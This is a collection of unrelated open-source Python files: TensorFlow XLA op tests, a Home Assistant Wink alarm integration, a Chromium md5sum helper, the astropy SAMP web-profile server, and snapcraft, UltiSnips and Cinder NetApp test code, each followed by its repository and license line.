expected=np.array([[8, 13], [10, 15]], dtype=dtype))
def testBroadcast(self):
for dtype in self.numeric_types:
v = np.arange(4, dtype=np.int32).astype(dtype).reshape([2, 2])
self._assertOpOutputMatchesExpected(
lambda x: xla.broadcast(x, (7, 42)),
args=(v,),
expected=np.tile(v, (7, 42, 1, 1)))
def testShiftRightLogical(self):
self._assertOpOutputMatchesExpected(
xla.shift_right_logical,
args=(np.array([-1, 16], dtype=np.int32), np.int32(4)),
expected=np.array([0x0FFFFFFF, 1], dtype=np.int32))
self._assertOpOutputMatchesExpected(
xla.shift_right_logical,
args=(np.array([0xFFFFFFFF, 16], dtype=np.uint32), np.uint32(4)),
expected=np.array([0x0FFFFFFF, 1], dtype=np.uint32))
def testShiftRightArithmetic(self):
self._assertOpOutputMatchesExpected(
xla.shift_right_arithmetic,
args=(np.array([-1, 16], dtype=np.int32), np.int32(4)),
expected=np.array([-1, 1], dtype=np.int32))
self._assertOpOutputMatchesExpected(
xla.shift_right_arithmetic,
args=(np.array([0xFFFFFFFF, 16], dtype=np.uint32), np.uint32(4)),
expected=np.array([0xFFFFFFFF, 1], dtype=np.uint32))
PRECISION_VALUES = (None, xla_data_pb2.PrecisionConfig.DEFAULT,
xla_data_pb2.PrecisionConfig.HIGH,
xla_data_pb2.PrecisionConfig.HIGHEST)
@parameterized.parameters(*PRECISION_VALUES)
def testConv(self, precision):
for dtype in set(self.float_types).intersection(
set([dtypes.bfloat16.as_numpy_dtype, np.float32])):
def conv_1d_fn(lhs, rhs):
dnums = xla_data_pb2.ConvolutionDimensionNumbers()
num_spatial_dims = 1
dnums.input_batch_dimension = 0
dnums.input_feature_dimension = 1
dnums.output_batch_dimension = 0
dnums.output_feature_dimension = 1
dnums.kernel_output_feature_dimension = 0
dnums.kernel_input_feature_dimension = 1
dnums.input_spatial_dimensions.extend(range(2, 2 + num_spatial_dims))
dnums.kernel_spatial_dimensions.extend(range(2, 2 + num_spatial_dims))
dnums.output_spatial_dimensions.extend(range(2, 2 + num_spatial_dims))
precision_config = None
if precision:
precision_config = xla_data_pb2.PrecisionConfig()
precision_config.operand_precision.extend([precision, precision])
return xla.conv(
lhs,
rhs,
window_strides=(1,),
padding=((2, 1),),
lhs_dilation=(1,),
rhs_dilation=(2,),
dimension_numbers=dnums)
self._assertOpOutputMatchesExpected(
conv_1d_fn,
args=(
np.array([[[3, 4, 5, 6]]], dtype=dtype),
np.array([[[-2, -3]]], dtype=dtype),
),
expected=np.array([[[-9, -12, -21, -26, -10]]], dtype=dtype))
@parameterized.parameters(*PRECISION_VALUES)
def testDotGeneral(self, precision):
for dtype in self.float_types:
def dot_fn(lhs, rhs):
dnums = xla_data_pb2.DotDimensionNumbers()
dnums.lhs_contracting_dimensions.append(2)
dnums.rhs_contracting_dimensions.append(1)
dnums.lhs_batch_dimensions.append(0)
dnums.rhs_batch_dimensions.append(0)
precision_config = None
if precision:
precision_config = xla_data_pb2.PrecisionConfig()
precision_config.operand_precision.extend([precision, precision])
return xla.dot_general(
lhs,
rhs,
dimension_numbers=dnums,
precision_config=precision_config)
lhs = np.array(
[
[[1, 2], [3, 4]],
[[5, 6], [7, 8]],
], dtype=dtype)
rhs = np.array(
[
[[1, 2, 3], [4, 5, 6]],
[[7, 8, 9], [10, 11, 12]],
], dtype=dtype)
self._assertOpOutputMatchesExpected(
dot_fn,
args=(lhs, rhs),
expected=np.array(
[
[[9, 12, 15], [19, 26, 33]],
[[95, 106, 117], [129, 144, 159]],
],
dtype=dtype))
def testNeg(self):
for dtype in self.numeric_types - {np.uint8, np.int8}:
self._assertOpOutputMatchesExpected(
xla.neg,
args=(np.array([1, 2, 3], dtype=dtype),),
expected=np.array([-1, -2, -3], dtype=dtype))
def testPad(self):
for dtype in self.numeric_types:
def pad_fn(x):
return xla.pad(
x,
padding_value=7,
padding_low=[2, 1],
padding_high=[1, 2],
padding_interior=[1, 0])
self._assertOpOutputMatchesExpected(
pad_fn,
args=(np.arange(4, dtype=np.int32).astype(dtype).reshape([2, 2]),),
expected=np.array(
[[7, 7, 7, 7, 7], [7, 7, 7, 7, 7], [7, 0, 1, 7, 7],
[7, 7, 7, 7, 7], [7, 2, 3, 7, 7], [7, 7, 7, 7, 7]],
dtype=dtype))
def testReduce(self):
for dtype in set(self.numeric_types).intersection(
set([dtypes.bfloat16.as_numpy_dtype, np.float32])):
@function.Defun(dtype, dtype)
def sum_reducer(x, y):
return x + y
def sum_reduction(dims):
def fn(x):
return xla.reduce(
x, init_value=0, dimensions_to_reduce=dims, reducer=sum_reducer)
return fn
self._assertOpOutputMatchesExpected(
sum_reduction(dims=[]),
args=(np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]),),
expected=np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]))
self._assertOpOutputMatchesExpected(
sum_reduction(dims=[0]),
args=(np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]),),
expected=np.array([12, 15, 18, 21], dtype=dtype))
self._assertOpOutputMatchesExpected(
sum_reduction(dims=[1]),
args=(np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]),),
expected=np.array([6, 22, 38], dtype=dtype))
self._assertOpOutputMatchesExpected(
sum_reduction(dims=[0, 1]),
args=(np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]),),
expected=dtype(66))
@function.Defun(dtype, dtype)
def mul_reducer(x, y):
return x * y
def mul_reduction(dims):
def fn(x):
return xla.reduce(
x, init_value=1, dimensions_to_reduce=dims, reducer=mul_reducer)
return fn
self._assertOpOutputMatchesExpected(
mul_reduction(dims=[0]),
args=(np.arange(12, dtype=np.int32).astype(dtype).reshape([3, 4]),),
expected=np.array([0, 45, 120, 231], dtype=dtype))
def testSelectAndScatter(self):
for dtype in set(self.numeric_types).intersection(
set([dtypes.bfloat16.as_numpy_dtype, np.float32])):
@function.Defun(dtype, dtype)
def add_scatter(x, y):
return x + y
@function.Defun(dtype, dtype)
def ge_select(x, y):
return x >= y
def test_fn(operand, source):
return xla.select_and_scatter(
operand,
window_dimensions=[2, 3, 1, 1],
window_strides=[2, 2, 1, 1],
padding=[[0, 0]] * 4,
source=source,
init_value=0,
select=ge_select,
scatter=add_scatter)
self._assertOpOutputMatchesExpected(
test_fn,
args=(np.array(
[[7, 2, 5, 3, 8], [3, 8, 9, 3, 4], [1, 5, 7, 5, 6],
[0, 6, 2, 10, 2]],
dtype=dtype).reshape((4, 5, 1, 1)),
np.array([[2, 6], [3, 1]], dtype=dtype).reshape((2, 2, 1, 1))),
expected=np.array(
[[0, 0, 0, 0, 0], [0, 0, 8, 0, 0], [0, 0, 3, 0, 0],
[0, 0, 0, 1, 0]],
dtype=dtype).reshape((4, 5, 1, 1)))
def testTranspose(self):
for dtype in self.numeric_types:
v = np.arange(4, dtype=np.int32).astype(dtype).reshape([2, 2])
self._assertOpOutputMatchesExpected(
lambda x: xla.transpose(x, [1, 0]), args=(v,), expected=v.T)
def testDynamicSlice(self):
for dtype in self.numeric_types:
self._assertOpOutputMatchesExpected(
xla.dynamic_slice,
args=(np.arange(1000,
dtype=np.int32).astype(dtype).reshape([10, 10, 10]),
np.array([5, 7, 3]), np.array([2, 3, 2])),
expected=np.array(
np.array([[[573, 574], [583, 584], [593, 594]],
[[673, 674], [683, 684], [693, 694]]]),
dtype=dtype))
def testDynamicSliceWithIncorrectStartIndicesShape(self):
with self.test_session() as session:
with self.test_scope():
output = xla.dynamic_slice(
np.arange(1000, dtype=np.int32).reshape([10, 10, 10]),
np.array([5, 7]), np.array([2, 3, 4]))
with self.assertRaises(errors.InvalidArgumentError) as invalid_arg_error:
session.run(output)
self.assertRegexpMatches(
invalid_arg_error.exception.message,
(r'start_indices must be a vector with length equal to input rank, '
r'but input rank is 3 and start_indices has shape \[2\].*'))
def testDynamicSliceWithIncorrectSizeIndicesShape(self):
with self.test_session() as session:
with self.test_scope():
output = xla.dynamic_slice(
np.arange(1000, dtype=np.int32).reshape([10, 10, 10]),
np.array([5, 7, 3]), np.array([2, 3]))
with self.assertRaises(errors.InvalidArgumentError) as invalid_arg_error:
session.run(output)
self.assertRegexpMatches(
invalid_arg_error.exception.message,
(r'size_indices must be a vector with length equal to input rank, '
r'but input rank is 3 and size_indices has shape \[2\].*'))
if __name__ == '__main__':
googletest.main()
| jendap/tensorflow | tensorflow/compiler/tests/xla_ops_test.py | Python | apache-2.0 | 12,658 |
"""Support Wink alarm control panels."""
import pywink
import homeassistant.components.alarm_control_panel as alarm
from homeassistant.components.alarm_control_panel.const import (
SUPPORT_ALARM_ARM_AWAY,
SUPPORT_ALARM_ARM_HOME,
)
from homeassistant.const import (
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_DISARMED,
)
from . import DOMAIN, WinkDevice
STATE_ALARM_PRIVACY = "Private"
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Wink platform."""
for camera in pywink.get_cameras():
# get_cameras returns multiple device types.
# Only add those that aren't sensors.
try:
camera.capability()
except AttributeError:
_id = camera.object_id() + camera.name()
if _id not in hass.data[DOMAIN]["unique_ids"]:
add_entities([WinkCameraDevice(camera, hass)])
class WinkCameraDevice(WinkDevice, alarm.AlarmControlPanelEntity):
"""Representation a Wink camera alarm."""
async def async_added_to_hass(self):
"""Call when entity is added to hass."""
self.hass.data[DOMAIN]["entities"]["alarm_control_panel"].append(self)
@property
def state(self):
"""Return the state of the device."""
wink_state = self.wink.state()
if wink_state == "away":
state = STATE_ALARM_ARMED_AWAY
elif wink_state == "home":
state = STATE_ALARM_DISARMED
elif wink_state == "night":
state = STATE_ALARM_ARMED_HOME
else:
state = None
return state
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
return SUPPORT_ALARM_ARM_HOME | SUPPORT_ALARM_ARM_AWAY
def alarm_disarm(self, code=None):
"""Send disarm command."""
self.wink.set_mode("home")
def alarm_arm_home(self, code=None):
"""Send arm home command."""
self.wink.set_mode("night")
def alarm_arm_away(self, code=None):
"""Send arm away command."""
self.wink.set_mode("away")
@property
def device_state_attributes(self):
"""Return the state attributes."""
return {"private": self.wink.private()}
| sdague/home-assistant | homeassistant/components/wink/alarm_control_panel.py | Python | apache-2.0 | 2,276 |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import logging
import os
import tempfile
import types
from pylib import cmd_helper
from pylib import constants
from pylib.utils import device_temp_file
HashAndPath = collections.namedtuple('HashAndPath', ['hash', 'path'])
MD5SUM_DEVICE_LIB_PATH = '/data/local/tmp/md5sum/'
MD5SUM_DEVICE_BIN_PATH = MD5SUM_DEVICE_LIB_PATH + 'md5sum_bin'
MD5SUM_DEVICE_SCRIPT_FORMAT = (
'test -f {path} -o -d {path} '
'&& LD_LIBRARY_PATH={md5sum_lib} {md5sum_bin} {path}')
def CalculateHostMd5Sums(paths):
"""Calculates the MD5 sum value for all items in |paths|.
Args:
paths: A list of host paths to md5sum.
Returns:
A list of named tuples with 'hash' and 'path' attributes.
"""
if isinstance(paths, basestring):
paths = [paths]
out = cmd_helper.GetCmdOutput(
[os.path.join(constants.GetOutDirectory(), 'md5sum_bin_host')] +
[p for p in paths])
return [HashAndPath(*l.split(None, 1)) for l in out.splitlines()]
def CalculateDeviceMd5Sums(paths, device):
"""Calculates the MD5 sum value for all items in |paths|.
Args:
paths: A list of device paths to md5sum.
Returns:
A list of named tuples with 'hash' and 'path' attributes.
"""
if isinstance(paths, basestring):
paths = [paths]
if not device.FileExists(MD5SUM_DEVICE_BIN_PATH):
device.adb.Push(
os.path.join(constants.GetOutDirectory(), 'md5sum_dist'),
MD5SUM_DEVICE_LIB_PATH)
out = []
with tempfile.NamedTemporaryFile() as md5sum_script_file:
with device_temp_file.DeviceTempFile(
device.adb) as md5sum_device_script_file:
md5sum_script = (
MD5SUM_DEVICE_SCRIPT_FORMAT.format(
path=p, md5sum_lib=MD5SUM_DEVICE_LIB_PATH,
md5sum_bin=MD5SUM_DEVICE_BIN_PATH)
for p in paths)
md5sum_script_file.write('; '.join(md5sum_script))
md5sum_script_file.flush()
device.adb.Push(md5sum_script_file.name, md5sum_device_script_file.name)
out = device.RunShellCommand(['sh', md5sum_device_script_file.name])
return [HashAndPath(*l.split(None, 1)) for l in out]
| mxOBS/deb-pkg_trusty_chromium-browser | build/android/pylib/utils/md5sum.py | Python | bsd-3-clause | 2,266 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from urllib.parse import parse_qs
from urllib.request import urlopen
from astropy.utils.data import get_pkg_data_contents
from .standard_profile import (SAMPSimpleXMLRPCRequestHandler,
ThreadingXMLRPCServer)
__all__ = []
CROSS_DOMAIN = get_pkg_data_contents('data/crossdomain.xml')
CLIENT_ACCESS_POLICY = get_pkg_data_contents('data/clientaccesspolicy.xml')
class WebProfileRequestHandler(SAMPSimpleXMLRPCRequestHandler):
"""
Handler of XMLRPC requests performed through the Web Profile.
"""
def _send_CORS_header(self):
if self.headers.get('Origin') is not None:
method = self.headers.get('Access-Control-Request-Method')
if method and self.command == "OPTIONS":
# Preflight method
self.send_header('Content-Length', '0')
self.send_header('Access-Control-Allow-Origin',
self.headers.get('Origin'))
self.send_header('Access-Control-Allow-Methods', method)
self.send_header('Access-Control-Allow-Headers', 'Content-Type')
self.send_header('Access-Control-Allow-Credentials', 'true')
else:
# Simple method
self.send_header('Access-Control-Allow-Origin',
self.headers.get('Origin'))
self.send_header('Access-Control-Allow-Headers', 'Content-Type')
self.send_header('Access-Control-Allow-Credentials', 'true')
def end_headers(self):
self._send_CORS_header()
SAMPSimpleXMLRPCRequestHandler.end_headers(self)
def _serve_cross_domain_xml(self):
cross_domain = False
if self.path == "/crossdomain.xml":
# Adobe standard
response = CROSS_DOMAIN
self.send_response(200, 'OK')
self.send_header('Content-Type', 'text/x-cross-domain-policy')
self.send_header("Content-Length", f"{len(response)}")
self.end_headers()
self.wfile.write(response.encode('utf-8'))
self.wfile.flush()
cross_domain = True
elif self.path == "/clientaccesspolicy.xml":
# Microsoft standard
response = CLIENT_ACCESS_POLICY
self.send_response(200, 'OK')
self.send_header('Content-Type', 'text/xml')
self.send_header("Content-Length", f"{len(response)}")
self.end_headers()
self.wfile.write(response.encode('utf-8'))
self.wfile.flush()
cross_domain = True
return cross_domain
def do_POST(self):
if self._serve_cross_domain_xml():
return
return SAMPSimpleXMLRPCRequestHandler.do_POST(self)
def do_HEAD(self):
if not self.is_http_path_valid():
self.report_404()
return
if self._serve_cross_domain_xml():
return
def do_OPTIONS(self):
self.send_response(200, 'OK')
self.end_headers()
def do_GET(self):
if not self.is_http_path_valid():
self.report_404()
return
split_path = self.path.split('?')
if split_path[0] in [f'/translator/{clid}' for clid in self.server.clients]:
# Request of a file proxying
urlpath = parse_qs(split_path[1])
try:
proxyfile = urlopen(urlpath["ref"][0])
self.send_response(200, 'OK')
self.end_headers()
self.wfile.write(proxyfile.read())
proxyfile.close()
except OSError:
self.report_404()
return
if self._serve_cross_domain_xml():
return
def is_http_path_valid(self):
valid_paths = (["/clientaccesspolicy.xml", "/crossdomain.xml"] +
[f'/translator/{clid}' for clid in self.server.clients])
return self.path.split('?')[0] in valid_paths
class WebProfileXMLRPCServer(ThreadingXMLRPCServer):
"""
XMLRPC server supporting the SAMP Web Profile.
"""
def __init__(self, addr, log=None, requestHandler=WebProfileRequestHandler,
logRequests=True, allow_none=True, encoding=None):
self.clients = []
ThreadingXMLRPCServer.__init__(self, addr, log, requestHandler,
logRequests, allow_none, encoding)
def add_client(self, client_id):
self.clients.append(client_id)
def remove_client(self, client_id):
try:
self.clients.remove(client_id)
except ValueError:
# No warning here because this method gets called for all clients,
# not just web clients, and we expect it to fail for non-web
# clients.
pass
def web_profile_text_dialog(request, queue):
samp_name = "unknown"
if isinstance(request[0], str):
# To support the old protocol version
samp_name = request[0]
else:
samp_name = request[0]["samp.name"]
text = \
f"""A Web application which declares to be
Name: {samp_name}
Origin: {request[2]}
is requesting to be registered with the SAMP Hub.
Pay attention that if you permit its registration, such
application will acquire all current user privileges, like
file read/write.
Do you give your consent? [yes|no]"""
print(text)
answer = input(">>> ")
queue.put(answer.lower() in ["yes", "y"])
| pllim/astropy | astropy/samp/web_profile.py | Python | bsd-3-clause | 5,583 |
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import integration_tests
class LoginLogoutTestCase(integration_tests.StoreTestCase):
def test_successful_login(self):
self.addCleanup(self.logout)
self.login(expect_success=True)
def test_failed_login(self):
self.login(
'[email protected]',
'wrongpassword',
expect_success=False)
| tsdgeos/snapcraft | integration_tests/test_store_login_logout.py | Python | gpl-3.0 | 1,032 |
# encoding: utf-8
from test.vim_test_case import VimTestCase as _VimTest
from test.constant import *
from test.util import running_on_windows
# Quotes in Snippets {{{#
# Test for Bug #774917
def _snip_quote(qt):
return (
('te' + qt + 'st', 'Expand me' + qt + '!', 'test: ' + qt),
('te', 'Bad', ''),
)
class Snippet_With_SingleQuote(_VimTest):
snippets = _snip_quote("'")
keys = "te'st" + EX
wanted = "Expand me'!"
class Snippet_With_SingleQuote_List(_VimTest):
snippets = _snip_quote("'")
keys = 'te' + LS + '2\n'
wanted = "Expand me'!"
class Snippet_With_DoubleQuote(_VimTest):
snippets = _snip_quote('"')
keys = 'te"st' + EX
wanted = "Expand me\"!"
class Snippet_With_DoubleQuote_List(_VimTest):
snippets = _snip_quote('"')
keys = 'te' + LS + '2\n'
wanted = "Expand me\"!"
# End: Quotes in Snippets #}}}
# Trailing whitespace {{{#
class RemoveTrailingWhitespace(_VimTest):
snippets = ('test', """Hello\t ${1:default}\n$2""", '', 's')
wanted = """Hello\nGoodbye"""
keys = 'test' + EX + BS + JF + 'Goodbye'
class TrimSpacesAtEndOfLines(_VimTest):
snippets = ('test', """next line\n\nshould be empty""", '', 'm')
wanted = """\tnext line\n\n\tshould be empty"""
keys = '\ttest' + EX
class DoNotTrimSpacesAtEndOfLinesByDefault(_VimTest):
snippets = ('test', """next line\n\nshould be empty""", '', '')
wanted = """\tnext line\n\t\n\tshould be empty"""
keys = '\ttest' + EX
class LeaveTrailingWhitespace(_VimTest):
snippets = ('test', """Hello \t ${1:default}\n$2""")
wanted = """Hello \t \nGoodbye"""
keys = 'test' + EX + BS + JF + 'Goodbye'
# End: Trailing whitespace #}}}
# Newline in default text {{{#
# Tests for bug 616315 #
class TrailingNewline_TabStop_NLInsideStuffBehind(_VimTest):
snippets = ('test', r"""
x${1:
}<-behind1
$2<-behind2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj<-behind1
k<-behind2"""
class TrailingNewline_TabStop_JustNL(_VimTest):
snippets = ('test', r"""
x${1:
}
$2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k"""
class TrailingNewline_TabStop_EndNL(_VimTest):
snippets = ('test', r"""
x${1:a
}
$2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k"""
class TrailingNewline_TabStop_StartNL(_VimTest):
snippets = ('test', r"""
x${1:
a}
$2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k"""
class TrailingNewline_TabStop_EndStartNL(_VimTest):
snippets = ('test', r"""
x${1:
a
}
$2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k"""
class TrailingNewline_TabStop_NotEndStartNL(_VimTest):
snippets = ('test', r"""
x${1:a
a}
$2""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k"""
class TrailingNewline_TabStop_ExtraNL_ECR(_VimTest):
snippets = ('test', r"""
x${1:a
a}
$2
""")
keys = 'test' + EX + 'j' + JF + 'k'
wanted = """
xj
k
"""
class _MultiLineDefault(_VimTest):
snippets = ('test', r"""
x${1:a
b
c
d
e
f}
$2""")
class MultiLineDefault_Jump(_MultiLineDefault):
keys = 'test' + EX + JF + 'y'
wanted = """
xa
b
c
d
e
f
y"""
class MultiLineDefault_Type(_MultiLineDefault):
keys = 'test' + EX + 'z' + JF + 'y'
wanted = """
xz
y"""
class MultiLineDefault_BS(_MultiLineDefault):
keys = 'test' + EX + BS + JF + 'y'
wanted = """
x
y"""
# End: Newline in default text #}}}
# Umlauts and Special Chars {{{#
class _UmlautsBase(_VimTest):
# SendKeys can't send UTF characters
skip_if = lambda self: running_on_windows()
class Snippet_With_Umlauts_List(_UmlautsBase):
snippets = _snip_quote('ü')
keys = 'te' + LS + '2\n'
wanted = 'Expand meü!'
class Snippet_With_Umlauts(_UmlautsBase):
snippets = _snip_quote('ü')
keys = 'teüst' + EX
wanted = 'Expand meü!'
class Snippet_With_Umlauts_TypeOn(_UmlautsBase):
snippets = ('ül', 'üüüüüßßßß')
keys = 'te ül' + EX + 'more text'
wanted = 'te üüüüüßßßßmore text'
class Snippet_With_Umlauts_OverwriteFirst(_UmlautsBase):
snippets = ('ül', 'üü ${1:world} üü ${2:hello}ßß\nüüüü')
keys = 'te ül' + EX + 'more text' + JF + JF + 'end'
wanted = 'te üü more text üü helloßß\nüüüüend'
class Snippet_With_Umlauts_OverwriteSecond(_UmlautsBase):
snippets = ('ül', 'üü ${1:world} üü ${2:hello}ßß\nüüüü')
keys = 'te ül' + EX + JF + 'more text' + JF + 'end'
wanted = 'te üü world üü more textßß\nüüüüend'
class Snippet_With_Umlauts_OverwriteNone(_UmlautsBase):
snippets = ('ül', 'üü ${1:world} üü ${2:hello}ßß\nüüüü')
keys = 'te ül' + EX + JF + JF + 'end'
wanted = 'te üü world üü helloßß\nüüüüend'
class Snippet_With_Umlauts_Mirrors(_UmlautsBase):
snippets = ('ül', 'üü ${1:world} üü $1')
keys = 'te ül' + EX + 'hello'
wanted = 'te üü hello üü hello'
class Snippet_With_Umlauts_Python(_UmlautsBase):
snippets = ('ül', 'üü ${1:world} üü `!p snip.rv = len(t[1])*"a"`')
keys = 'te ül' + EX + 'hüüll'
wanted = 'te üü hüüll üü aaaaa'
class UmlautsBeforeTriggerAndCharsAfter(_UmlautsBase):
snippets = ('trig', 'success')
keys = 'ööuu trig b' + 2 * ARR_L + EX
wanted = 'ööuu success b'
class NoUmlautsBeforeTriggerAndCharsAfter(_UmlautsBase):
snippets = ('trig', 'success')
keys = 'oouu trig b' + 2 * ARR_L + EX
wanted = 'oouu success b'
# End: Umlauts and Special Chars #}}}
| Insanityandme/dotfiles | vim/bundle/ultisnips/test/test_Chars.py | Python | unlicense | 5,521 |
# Copyright (c) - 2014, Clinton Knight All rights reserved.
# Copyright (c) - 2015, Alex Meade. All Rights Reserved.
# Copyright (c) - 2015, Rushil Chugh. All Rights Reserved.
# Copyright (c) - 2015, Tom Barron. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder.volume import configuration as conf
import cinder.volume.drivers.netapp.options as na_opts
ISCSI_FAKE_LUN_ID = 1
ISCSI_FAKE_IQN = 'iqn.1993-08.org.debian:01:10'
ISCSI_FAKE_ADDRESS = '10.63.165.216'
ISCSI_FAKE_PORT = '2232'
ISCSI_FAKE_VOLUME = {'id': 'fake_id'}
ISCSI_FAKE_TARGET = {}
ISCSI_FAKE_TARGET['address'] = ISCSI_FAKE_ADDRESS
ISCSI_FAKE_TARGET['port'] = ISCSI_FAKE_PORT
ISCSI_FAKE_VOLUME = {'id': 'fake_id', 'provider_auth': 'None stack password'}
FC_ISCSI_TARGET_INFO_DICT = {'target_discovered': False,
'target_portal': '10.63.165.216:2232',
'target_iqn': ISCSI_FAKE_IQN,
'target_lun': ISCSI_FAKE_LUN_ID,
'volume_id': ISCSI_FAKE_VOLUME['id'],
'auth_method': 'None', 'auth_username': 'stack',
'auth_password': 'password'}
VOLUME_NAME = 'fake_volume_name'
VOLUME_ID = 'fake_volume_id'
VOLUME_TYPE_ID = 'fake_volume_type_id'
VOLUME = {
'name': VOLUME_NAME,
'size': 42,
'id': VOLUME_ID,
'host': 'fake_host@fake_backend#fake_pool',
'volume_type_id': VOLUME_TYPE_ID,
}
SNAPSHOT_NAME = 'fake_snapshot_name'
SNAPSHOT_ID = 'fake_snapshot_id'
SNAPSHOT = {
'name': SNAPSHOT_NAME,
'id': SNAPSHOT_ID,
'volume_id': VOLUME_ID,
'volume_name': VOLUME_NAME,
'volume_size': 42,
}
QOS_SPECS = {}
EXTRA_SPECS = {}
MAX_THROUGHPUT = '21734278B/s'
QOS_POLICY_GROUP_NAME = 'fake_qos_policy_group_name'
LEGACY_EXTRA_SPECS = {'netapp:qos_policy_group': QOS_POLICY_GROUP_NAME}
LEGACY_QOS = {
'policy_name': QOS_POLICY_GROUP_NAME,
}
QOS_POLICY_GROUP_SPEC = {
'max_throughput': MAX_THROUGHPUT,
'policy_name': 'openstack-%s' % VOLUME_ID,
}
QOS_POLICY_GROUP_INFO_NONE = {'legacy': None, 'spec': None}
QOS_POLICY_GROUP_INFO = {'legacy': None, 'spec': QOS_POLICY_GROUP_SPEC}
LEGACY_QOS_POLICY_GROUP_INFO = {
'legacy': LEGACY_QOS,
'spec': None,
}
INVALID_QOS_POLICY_GROUP_INFO = {
'legacy': LEGACY_QOS,
'spec': QOS_POLICY_GROUP_SPEC,
}
QOS_SPECS_ID = 'fake_qos_specs_id'
QOS_SPEC = {'maxBPS': 21734278}
OUTER_BACKEND_QOS_SPEC = {
'id': QOS_SPECS_ID,
'specs': QOS_SPEC,
'consumer': 'back-end',
}
OUTER_FRONTEND_QOS_SPEC = {
'id': QOS_SPECS_ID,
'specs': QOS_SPEC,
'consumer': 'front-end',
}
OUTER_BOTH_QOS_SPEC = {
'id': QOS_SPECS_ID,
'specs': QOS_SPEC,
'consumer': 'both',
}
VOLUME_TYPE = {'id': VOLUME_TYPE_ID, 'qos_specs_id': QOS_SPECS_ID}
def create_configuration():
config = conf.Configuration(None)
config.append_config_values(na_opts.netapp_connection_opts)
config.append_config_values(na_opts.netapp_transport_opts)
config.append_config_values(na_opts.netapp_basicauth_opts)
config.append_config_values(na_opts.netapp_provisioning_opts)
return config
def create_configuration_7mode():
config = create_configuration()
config.append_config_values(na_opts.netapp_7mode_opts)
return config
def create_configuration_cmode():
config = create_configuration()
config.append_config_values(na_opts.netapp_cluster_opts)
return config
| Hybrid-Cloud/cinder | cinder/tests/unit/volume/drivers/netapp/fakes.py | Python | apache-2.0 | 3,984 |
Subsets and Splits